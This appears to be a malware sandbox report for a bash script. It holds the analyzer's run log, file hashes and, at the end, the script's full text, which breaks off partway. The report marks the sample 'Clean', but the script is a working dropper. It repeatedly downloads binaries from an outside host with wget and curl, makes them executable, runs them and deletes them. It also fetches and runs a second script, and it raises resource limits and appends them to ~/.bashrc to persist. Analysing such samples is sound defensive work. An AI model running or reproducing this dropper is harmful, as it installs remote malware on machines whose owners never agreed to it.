Status: Clean
Analysis
| Category | Package | Started | Completed | Duration | Options | Log(s) | MalScore |
|---|---|---|---|---|---|---|---|
| FILE | bash | 2025-12-08 14:03:24 | 2025-12-08 14:03:53 | 29 seconds | Show Options | Show Analysis Log | 2.5 |
vnc_port=5901
2025-12-08 05:52:09,001 [root] DEBUG: Starting analyzer from: /tmp7_5yn7x6 2025-12-08 05:52:09,001 [root] DEBUG: Storing results at: /tmp/eNwbVgsgtA 2025-12-08 05:52:09,003 [root] DEBUG: Importing auxiliary module "modules.auxiliary.auditd"... 2025-12-08 05:52:09,003 [root] DEBUG: Importing auxiliary module "modules.auxiliary.filecollector"... 2025-12-08 05:52:09,007 [root] DEBUG: Importing auxiliary module "modules.auxiliary.human"... 2025-12-08 05:52:09,007 [root] DEBUG: Importing auxiliary module "modules.auxiliary.screenshots"... 2025-12-08 05:52:09,015 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops' 2025-12-08 05:52:09,019 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw' 2025-12-08 05:52:09,036 [root] DEBUG: Importing auxiliary module "modules.auxiliary.sysmon"... 2025-12-08 05:52:09,036 [root] DEBUG: Importing auxiliary module "modules.auxiliary.tracee"... 2025-12-08 05:52:09,038 [root] DEBUG: Initialized auxiliary module "Auditd" 2025-12-08 05:52:09,038 [root] DEBUG: Trying to start auxiliary module "Auditd"... 2025-12-08 05:52:09,038 [root] DEBUG: Started auxiliary module "Auditd" 2025-12-08 05:52:09,039 [modules.auxiliary.filecollector] INFO: FileCollector run started 2025-12-08 05:52:09,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir sbin 2025-12-08 05:52:09,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir srv 2025-12-08 05:52:09,043 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir media 2025-12-08 05:52:09,043 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir libx32 2025-12-08 05:52:09,043 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp7_5yn7x6 2025-12-08 05:52:09,044 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir etc 2025-12-08 05:52:09,106 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir mnt 2025-12-08 05:52:09,106 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmpij155kl0 2025-12-08 05:52:09,109 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir boot 2025-12-08 05:52:09,112 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir cdrom 2025-12-08 05:52:09,112 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir bin 2025-12-08 05:52:09,112 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir root 2025-12-08 05:52:09,116 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir opt 2025-12-08 05:52:09,117 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir snap 2025-12-08 05:52:09,627 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp 2025-12-08 05:52:09,628 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir home 2025-12-08 05:52:09,641 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lost+found 2025-12-08 05:52:09,642 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lib32 2025-12-08 05:52:09,642 [modules.auxiliary.filecollector] INFO: FileCollector setup complete 2025-12-08 05:52:10,041 [root] DEBUG: Initialized auxiliary module "FileCollector" 2025-12-08 05:52:10,041 [root] DEBUG: Trying to start auxiliary module "FileCollector"... 2025-12-08 05:52:10,041 [root] DEBUG: Started auxiliary module "FileCollector" 2025-12-08 05:52:10,042 [modules.auxiliary.human] DEBUG: Human init complete 2025-12-08 05:52:10,042 [root] DEBUG: Initialized auxiliary module "Human" 2025-12-08 05:52:10,042 [root] DEBUG: Trying to start auxiliary module "Human"... 2025-12-08 05:52:10,042 [root] DEBUG: Started auxiliary module "Human" 2025-12-08 05:52:10,042 [root] DEBUG: Initialized auxiliary module "Screenshots" 2025-12-08 05:52:10,042 [root] DEBUG: Trying to start auxiliary module "Screenshots"... 2025-12-08 05:52:10,042 [root] DEBUG: Started auxiliary module "Screenshots" 2025-12-08 05:52:10,042 [root] DEBUG: Initialized auxiliary module "Sysmon" 2025-12-08 05:52:10,042 [root] DEBUG: Trying to start auxiliary module "Sysmon"... 2025-12-08 05:52:10,055 [root] DEBUG: Started auxiliary module "Sysmon" 2025-12-08 05:52:10,055 [modules.auxiliary.tracee] INFO: docker start 2025-12-08 05:52:10,055 [root] DEBUG: Initialized auxiliary module "Docker" 2025-12-08 05:52:10,055 [root] DEBUG: Trying to start auxiliary module "Docker"... 2025-12-08 05:52:10,082 [modules.auxiliary.tracee] DEBUG: Starting docker container 2025-12-08 05:52:10,092 [modules.auxiliary.tracee] DEBUG: Attempt to remove Tracee container if it exists. 2025-12-08 05:52:10,093 [modules.auxiliary.tracee] DEBUG: sudo docker run --name tracee -d --pid=host --cgroupns=host --privileged -v /etc/os-release:/etc/os-release-host:ro -v /tmp7_5yn7x6/tracee-artifacts/:/tmp/tracee/out/host -v /var/run:/var/run:ro -v /tmp7_5yn7x6/modules/auxiliary/tracee:/policy aquasec/tracee:latest --output json --output option:parse-arguments,exec-env,exec-hash --policy /policy/policy.yml --cache cache-type=mem --cache mem-cache-size=1024 --capture bpf --capture module --capture write --signatures-dir=/policy/signatures --signatures-dir=./signatures 2025-12-08 05:52:10,300 [modules.auxiliary.tracee] DEBUG: Docker container started: 7f8c9511b7a1aceabe4c1edd50c78852d2b4a4d2c9c41ad0ab698e08989aa606 2025-12-08 05:52:10,302 [lib.common.results] INFO: File /bin/sh-shim size is 125688, Max size: 100000000 2025-12-08 05:52:20,315 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32702 size is 0, Max size: 100000000 2025-12-08 05:52:20,318 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32702 size is 34, Max size: 100000000 2025-12-08 05:52:20,333 [modules.auxiliary.tracee] INFO: Try to stream 2025-12-08 05:52:20,333 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d528070> 2025-12-08 05:52:20,334 [modules.auxiliary.tracee] INFO: Streamstart 2025-12-08 05:52:20,334 [root] DEBUG: Started auxiliary module "Docker" 2025-12-08 05:52:20,334 [lib.core.packages] INFO: /bin/bash 2025-12-08 05:52:20,335 [lib.core.packages] INFO: Process will start with strace + sh-shim for Tracee's scope 2025-12-08 05:52:20,335 [lib.core.packages] INFO: sudo strace -v -o /dev/stderr -s 800 -ttf /bin/sh-shim -c "/bin/bash /tmp/0076fe37f41ee52f12cf7.sh" 2025-12-08 05:52:20,336 [lib.core.packages] INFO: Process started 2025-12-08 05:52:20,336 [root] INFO: Added new process to list with pid: 2176 2025-12-08 05:52:20,337 [root] INFO: New child process detected: 2178 2025-12-08 05:52:20,339 [root] ERROR: Could not read memory range 7f07e01b3000-7f07e01c1000: [Errno 5] Input/output error 2025-12-08 05:52:20,340 [root] ERROR: Could not read memory range 7ffe4f79a000-7ffe4f79e000: [Errno 5] Input/output error 2025-12-08 05:52:20,340 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2178.dmp size is 946176, Max size: 100000000 2025-12-08 05:52:20,346 [root] INFO: Added new process to list with pid: 2178 2025-12-08 05:52:20,463 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 77, Max size: 100000000 2025-12-08 05:52:20,468 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 156, Max size: 100000000 2025-12-08 05:52:20,495 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 202, Max size: 100000000 2025-12-08 05:52:20,499 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 277, Max size: 100000000 2025-12-08 05:52:20,589 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 279, Max size: 100000000 2025-12-08 05:52:20,591 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 279, Max size: 100000000 2025-12-08 05:52:20,593 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 284, Max size: 100000000 2025-12-08 05:52:20,594 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 293, Max size: 100000000 2025-12-08 05:52:20,602 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 343, Max size: 100000000 2025-12-08 05:52:20,604 [root] INFO: New child process detected: 2186 2025-12-08 05:52:20,607 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 356, Max size: 100000000 2025-12-08 05:52:20,609 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 357, Max size: 100000000 2025-12-08 05:52:20,623 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 364, Max size: 100000000 2025-12-08 05:52:20,624 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 364, Max size: 100000000 2025-12-08 05:52:20,634 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 397, Max size: 100000000 2025-12-08 05:52:20,640 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 428, Max size: 100000000 2025-12-08 05:52:20,648 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 465, Max size: 100000000 2025-12-08 05:52:20,653 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 489, Max size: 100000000 2025-12-08 05:52:20,660 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 493, Max size: 100000000 2025-12-08 05:52:20,666 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 557, Max size: 100000000 2025-12-08 05:52:20,667 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 557, Max size: 100000000 2025-12-08 05:52:20,670 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 580, Max size: 100000000 2025-12-08 05:52:20,711 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2186.dmp size is 23719936, Max size: 100000000 2025-12-08 05:52:20,820 [root] INFO: Added new process to list with pid: 2186 2025-12-08 05:52:20,821 [root] INFO: New child process detected: 2179 2025-12-08 05:52:20,884 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 662, Max size: 100000000 2025-12-08 05:52:20,889 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 741, Max size: 100000000 2025-12-08 05:52:20,912 [root] ERROR: Could not read memory range 7ffef9ba6000-7ffef9baa000: [Errno 5] Input/output error 2025-12-08 05:52:20,914 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2179.dmp size is 19468288, Max size: 100000000 2025-12-08 05:52:20,915 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 787, Max size: 100000000 2025-12-08 05:52:20,926 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 862, Max size: 100000000 2025-12-08 05:52:21,004 [root] INFO: Added new process to list with pid: 2179 2025-12-08 05:52:21,005 [root] INFO: New child process detected: 2182 2025-12-08 05:52:21,024 [root] ERROR: Could not read memory range 7ffc30db8000-7ffc30dbc000: [Errno 5] Input/output error 2025-12-08 05:52:21,024 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2182.dmp size is 2523136, Max size: 100000000 2025-12-08 05:52:21,039 [root] INFO: Added new process to list with pid: 2182 2025-12-08 05:52:21,039 [root] INFO: New child process detected: 2183 2025-12-08 05:52:21,082 [root] ERROR: Could not read memory range 7fff50d73000-7fff50d77000: [Errno 5] Input/output error 2025-12-08 05:52:21,083 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2183.dmp size is 17321984, Max size: 100000000 2025-12-08 05:52:21,119 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 865, Max size: 100000000 2025-12-08 05:52:21,128 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 870, Max size: 100000000 2025-12-08 05:52:21,138 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 872, Max size: 100000000 2025-12-08 05:52:21,143 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 875, Max size: 100000000 2025-12-08 05:52:21,154 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 880, Max size: 100000000 2025-12-08 05:52:21,160 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 883, Max size: 100000000 2025-12-08 05:52:21,165 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 887, Max size: 100000000 2025-12-08 05:52:21,176 [root] INFO: Added new process to list with pid: 2183 2025-12-08 05:52:21,177 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 897, Max size: 100000000 2025-12-08 05:52:21,182 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 909, Max size: 100000000 2025-12-08 05:52:21,192 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 929, Max size: 100000000 2025-12-08 05:52:21,196 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 936, Max size: 100000000 2025-12-08 05:52:21,202 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 939, Max size: 100000000 2025-12-08 05:52:21,206 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 948, Max size: 100000000 2025-12-08 05:52:21,209 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 954, Max size: 100000000 2025-12-08 05:52:21,212 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 965, Max size: 100000000 2025-12-08 05:52:21,214 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 972, Max size: 100000000 2025-12-08 05:52:21,217 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 982, Max size: 100000000 2025-12-08 05:52:21,219 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 989, Max size: 100000000 2025-12-08 05:52:21,222 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 998, Max size: 100000000 2025-12-08 05:52:21,224 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1010, Max size: 100000000 2025-12-08 05:52:21,226 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1017, Max size: 100000000 2025-12-08 05:52:21,229 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1032, Max size: 100000000 2025-12-08 05:52:21,232 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1043, Max size: 100000000 2025-12-08 05:52:21,234 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1051, Max size: 100000000 2025-12-08 05:52:21,236 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1063, Max size: 100000000 2025-12-08 05:52:21,238 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1069, Max size: 100000000 2025-12-08 05:52:21,240 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1078, Max size: 100000000 2025-12-08 05:52:21,242 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1084, Max size: 100000000 2025-12-08 05:52:21,244 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1090, Max size: 100000000 2025-12-08 05:52:21,246 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1094, Max size: 100000000 2025-12-08 05:52:21,247 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1099, Max size: 100000000 2025-12-08 05:52:21,251 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1100, Max size: 100000000 2025-12-08 05:52:21,253 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1104, Max size: 100000000 2025-12-08 05:52:21,254 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1109, Max size: 100000000 2025-12-08 05:52:21,256 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1116, Max size: 100000000 2025-12-08 05:52:21,258 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1123, Max size: 100000000 2025-12-08 05:52:21,261 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1130, Max size: 100000000 2025-12-08 05:52:21,262 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1135, Max size: 100000000 2025-12-08 05:52:21,264 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1141, Max size: 100000000 2025-12-08 05:52:21,266 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1146, Max size: 100000000 2025-12-08 05:52:21,268 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1153, Max size: 100000000 2025-12-08 05:52:21,270 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1164, Max size: 100000000 2025-12-08 05:52:21,272 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1165, Max size: 100000000 2025-12-08 05:52:21,340 [root] INFO: Process with pid 2186 has terminated 2025-12-08 05:52:21,428 [root] INFO: New child process detected: 2201 2025-12-08 05:52:21,459 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2201.dmp size is 14905344, Max size: 100000000 2025-12-08 05:52:21,517 [root] INFO: Added new process to list with pid: 2201 2025-12-08 05:52:21,637 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1242, Max size: 100000000 2025-12-08 05:52:21,644 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1321, Max size: 100000000 2025-12-08 05:52:21,655 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1442, Max size: 100000000 2025-12-08 05:52:21,710 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1445, Max size: 100000000 2025-12-08 05:52:21,716 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1464, Max size: 100000000 2025-12-08 05:52:21,723 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1490, Max size: 100000000 2025-12-08 05:52:21,729 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1508, Max size: 100000000 2025-12-08 05:52:21,733 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1527, Max size: 100000000 2025-12-08 05:52:21,737 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1542, Max size: 100000000 2025-12-08 05:52:21,741 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1543, Max size: 100000000 2025-12-08 05:52:21,747 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1569, Max size: 100000000 2025-12-08 05:52:21,750 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1580, Max size: 100000000 2025-12-08 05:52:21,761 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1638, Max size: 100000000 2025-12-08 05:52:21,767 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1679, Max size: 100000000 2025-12-08 05:52:21,772 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1719, Max size: 100000000 2025-12-08 05:52:21,777 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1745, Max size: 100000000 2025-12-08 05:52:21,782 [root] INFO: New child process detected: 2212 2025-12-08 05:52:21,832 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1786, Max size: 100000000 2025-12-08 05:52:21,871 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2212.dmp size is 14970880, Max size: 100000000 2025-12-08 05:52:21,955 [root] INFO: Added new process to list with pid: 2212 2025-12-08 05:52:22,013 [lib.common.results] INFO: File /root/.bashrc size is 3443, Max size: 100000000 2025-12-08 05:52:22,017 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-8388611.inode-786435 size is 3443, Max size: 100000000 2025-12-08 05:52:22,020 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-8388611.inode-786435 size is 3652, Max size: 100000000 2025-12-08 05:52:22,022 [lib.common.results] INFO: File /root/.bashrc size is 3652, Max size: 100000000 2025-12-08 05:52:22,341 [root] INFO: Process with pid 2176 has terminated 2025-12-08 05:52:22,342 [root] INFO: Process with pid 2178 has terminated 2025-12-08 05:52:22,342 [root] INFO: Process with pid 2179 has terminated 2025-12-08 05:52:22,342 [root] INFO: Process with pid 2212 has terminated 2025-12-08 05:52:22,342 [root] INFO: Process with pid 2182 has terminated 2025-12-08 05:52:22,342 [root] INFO: Process with pid 2183 has terminated 2025-12-08 05:52:22,342 [root] INFO: Process with pid 2201 has terminated 2025-12-08 05:52:22,342 [root] INFO: Process list is empty, terminating analysis 2025-12-08 05:52:23,337 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d528070> 2025-12-08 05:52:23,343 [root] INFO: Stopping auxiliary modules 2025-12-08 05:52:23,343 [root] INFO: Stopping auxiliary module: Auditd 2025-12-08 05:52:23,343 [root] INFO: Stopping auxiliary module: FileCollector 2025-12-08 05:52:23,363 [modules.auxiliary.tracee] INFO: CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 7f8c9511b7a1 aquasec/tracee:latest "/tracee/entrypoint.…" 13 seconds ago Up 13 seconds tracee 2025-12-08 05:52:23,384 [modules.auxiliary.tracee] INFO: sudo tail +1f /var/lib/docker/containers/7f8c9511b7a1aceabe4c1edd50c78852d2b4a4d2c9c41ad0ab698e08989aa606/7f8c9511b7a1aceabe4c1edd50c78852d2b4a4d2c9c41ad0ab698e08989aa606-json.log 2025-12-08 05:52:30,345 [root] INFO: Stopping auxiliary module: Human 2025-12-08 05:52:30,346 [root] INFO: Stopping auxiliary module: Screenshots 2025-12-08 05:52:30,346 [root] INFO: Stopping auxiliary module: Sysmon 2025-12-08 05:52:30,347 [modules.auxiliary.filecollector] INFO: FileCollector run completed 2025-12-08 05:52:30,353 [lib.common.results] INFO: File /tmp/sysmon.data size is 17, Max size: 100000000 2025-12-08 05:52:30,354 [root] INFO: Stopping auxiliary module: Docker 2025-12-08 05:52:30,354 [modules.auxiliary.tracee] DEBUG: Tracee module instructed to stop 2025-12-08 05:52:30,355 [modules.auxiliary.tracee] DEBUG: Tracee module instructed to stop + was enabled 2025-12-08 05:52:30,355 [modules.auxiliary.tracee] DEBUG: Tracee module skips log collection as it uses streaming 2025-12-08 05:52:32,716 [modules.auxiliary.tracee] DEBUG: Docker container stopped: tracee 2025-12-08 05:52:32,716 [root] INFO: Finishing auxiliary modules 2025-12-08 05:52:32,717 [lib.common.results] WARNING: File /sslkeylog.log doesn't exist anymore 2025-12-08 05:52:32,717 [root] INFO: Analysis completed
Machine
| Name | Label | Manager | Started On | Shutdown On |
|---|---|---|---|---|
| ubuntu22.04-64bit-1 | ubuntu22.04-64bit-1 | KVM | 2025-12-08 14:03:24 | 2025-12-08 14:03:53 |
File Details
| File Name |
0076fe37f41ee52f12cf7.sh
|
|---|---|
| File Type | Bourne-Again shell script, ASCII text executable |
| File Size | 3313 bytes |
| MD5 | cf70ee36f1e9247f2146e4981924d4f4 |
| SHA1 | 7eabae4200118c4e89979658db6e4d905fe3dae9 |
| SHA256 | 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c [VT] [MWDB] [Bazaar] |
| SHA3-384 | 6157430bc8501acb2061335e506fe667ac879772861feb6b636962f63063edfc0737b6cf21438bfe8793e78e9a0da2d6 |
| CRC32 | 95B74DFB |
| TLSH | T14F614899B3DD867548F5F0B21A3E994C222962E2421D5DCDB6EB6CFF244E9C4E3081D3 |
| Ssdeep | 48:7NyNy2INyPyRp7y11tyhycyQAFCp7yr1ty25:7NA+NGeZ28HXAFCZcv |
| File BinGraph Vba2Graph Text |
#!/bin/bash cd /tmp; wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0; curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0; chmod +x m3cr0; ./m3cr0; rm -rf m3cr0; rm -rf m3cr0.1 cd /tmp; wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64; curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64; chmod +x zigaarch64; ./zigaarch64; rm -rf zigaarch64; rm -rf zigaarch64.1 cd /tmp; wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x; curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x; chmod +x x00x; ./x00x; rm -rf x00x; rm -rf x00x.1 wget http://floodernetwork111.accesscam.org:8089/bash.sh curl -O http://floodernetwork111.accesscam.org:8089/bash.sh bash bash.sh & rm -rf bash.sh.1 ulimit -u unlimited ulimit -s unlimited ulimit -q unlimited ulimit -n 999999 ulimit -l unlimited ulimit -i unlimited ulimit -c unlimited ulimit -e unlimited ulimit -r unlimited echo "ulimit -u unlimited" >> ~/.bashrc echo "ulimit -s unlimited" >> ~/.bashrc echo "ulimit -q unlimited" >> ~/.bashrc echo "ulimit -n 999999" >> ~/.bashrc echo "ulimit -l unlimited" >> ~/.bashrc echo "ulimit -i unlimited" >> ~/.bashrc echo "ulimit -c unlimited" >> ~/.bashrc echo "ulimit -e unlimited" >> ~/.bashrc echo "ulimit -r unlimited" >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> 